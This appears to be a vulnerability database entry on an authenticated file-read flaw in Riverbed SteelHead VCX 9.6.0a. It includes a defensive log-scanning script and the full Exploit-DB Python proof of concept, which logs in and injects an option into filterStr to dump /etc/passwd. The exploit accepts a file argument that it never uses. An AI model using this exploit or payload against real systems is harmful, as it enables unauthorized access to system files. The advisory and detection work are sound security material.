Vendor: SteelHead VCX
By: Gregory DRAPERI
CVSS: 7,5 (HIGH)
Arbitrary file reading
CWE: 22
Product Name: SteelHead VCX
Affected Version From: SteelHead VCX (VCX255U) (x86_64) 9.6.0a
Affected Version To: SteelHead VCX (VCX255U) (x86_64) 9.6.0a
Patch Exists: YES
Related CWE: N/A
CPE: a:riverbed:steelhead_vcx
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

Arbitrary file reading by authenticated users on Riverbed SteelHead VCX

An authenticated user can read arbitrary files on Riverbed SteelHead VCX. The issue was discovered by Gregory DRAPERI in 2017, and the vulnerable version is SteelHead VCX (VCX255U) (x86_64) 9.6.0a. The exploit authenticates with a Session object and then sends a GET request to /modules/common/logs, passing the file path in the filterStr parameter, to read the file.

Mitigation:

Ensure that the authentication process is secure and that authenticated users cannot read arbitrary files through the web interface. The record above lists a patch as available.
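A log-review check for the request pattern the proof of concept sends, as an added example that is not part of the original advisory or exploit: it scans web access logs for GET requests to /modules/common/logs whose filterStr value contains option-like or absolute-path tokens, which generalizes slightly beyond the single /etc/passwd request shown on this page. The access-log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in an assumed combined-style access-log format.
SAMPLE_LOG = """\
10.0.0.5 - admin [12/Mar/2017:10:01:02 +0000] "GET /modules/common/logs?filterStr=msg:error HTTP/1.1" 200 5120
10.0.0.9 - monitor [12/Mar/2017:10:03:44 +0000] "GET /modules/common/logs?filterStr=msg:-e%20.*%20/etc/passwd%20 HTTP/1.1" 200 1873
10.0.0.5 - admin [12/Mar/2017:10:04:10 +0000] "GET /modules/common/logs?filterStr=msg:link+down HTTP/1.1" 200 2210
10.0.0.12 - viewer [12/Mar/2017:10:05:01 +0000] "GET /modules/common/logs?filterStr=msg:-e+.*+/etc/passwd HTTP/1.1" 200 1873
"""

LOG_PATH = "/modules/common/logs"  # endpoint requested by the proof of concept
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)


def suspicious_tokens(filter_str):
    """Return tokens of a decoded filterStr that look like options or absolute paths."""
    tokens = filter_str.split()
    # The first token carries the field prefix (e.g. "msg:"); drop it before checking.
    if tokens and ":" in tokens[0]:
        tokens[0] = tokens[0].split(":", 1)[1]
    return [t for t in tokens if t.startswith("-") or t.startswith("/")]


def scan(log_text):
    """Return one finding per log line whose filterStr carries suspicious tokens."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path.rstrip("/") != LOG_PATH:
            continue
        # parse_qs percent-decodes and turns "+" into spaces, like the server would.
        for value in parse_qs(url.query, keep_blank_values=True).get("filterStr", []):
            hits = suspicious_tokens(value)
            if hits:
                findings.append({"src": m.group("src"), "user": m.group("user"),
                                 "filterStr": value, "tokens": hits})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("%(src)s user=%(user)s filterStr=%(filterStr)r tokens=%(tokens)s" % f)
```

Ordinary log searches that legitimately contain a leading dash or slash will also be flagged, so treat findings as leads to review against the account and source address rather than as confirmed abuse.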

Exploit-DB raw data:

# Exploit title : Arbitrary file reading by authenticated users on Riverbed SteelHead VCX
# Vendor: Riverbed
# Author: Gregory DRAPERI <gregory.draper_at_gmail.com>
# Date: 03/2017
# Software Link: https://www.riverbed.com/gb/products/steelhead/Free-90-day-Evaluation-SteelHead-CX-Virtual-Edition.html
# Version: SteelHead VCX (VCX255U) (x86_64) 9.6.0a
import sys
import requests


def exploit(address, login, password,file):
    s = requests.Session()
    url = address
    try:
        r1 = s.get(url+"/login?next=/");
        cookies = requests.utils.dict_from_cookiejar(s.cookies);
        csrf = cookies["csrftoken"]
        authentication = {'csrfmiddlewaretoken': csrf, '_fields': "{\"username\":\""+login+"\",\"password\":\""+password+"\",\"legalAccepted\":\"N/A\",\"userAgent\":\"\"}"}
        r2 = s.post(url+"/login?next=/",  data=authentication)
        r3 = s.get(url+"/modules/common/logs?filterStr=msg:-e .* /etc/passwd ")
        print r3.text

    except Exception as e:
        print "\n! ERROR: %s" % e
    return False



if len(sys.argv) < 5:
    print "Usage: exploit.py <target> <login> <password> <file>\n"
    print "Example: exploit.py http://192.168.1.2 admin password /etc/passwd\n"
    quit()
target = sys.argv[1]
login = sys.argv[2]
password = sys.argv[3]
file = sys.argv[4]
exploit(target,login,password,file)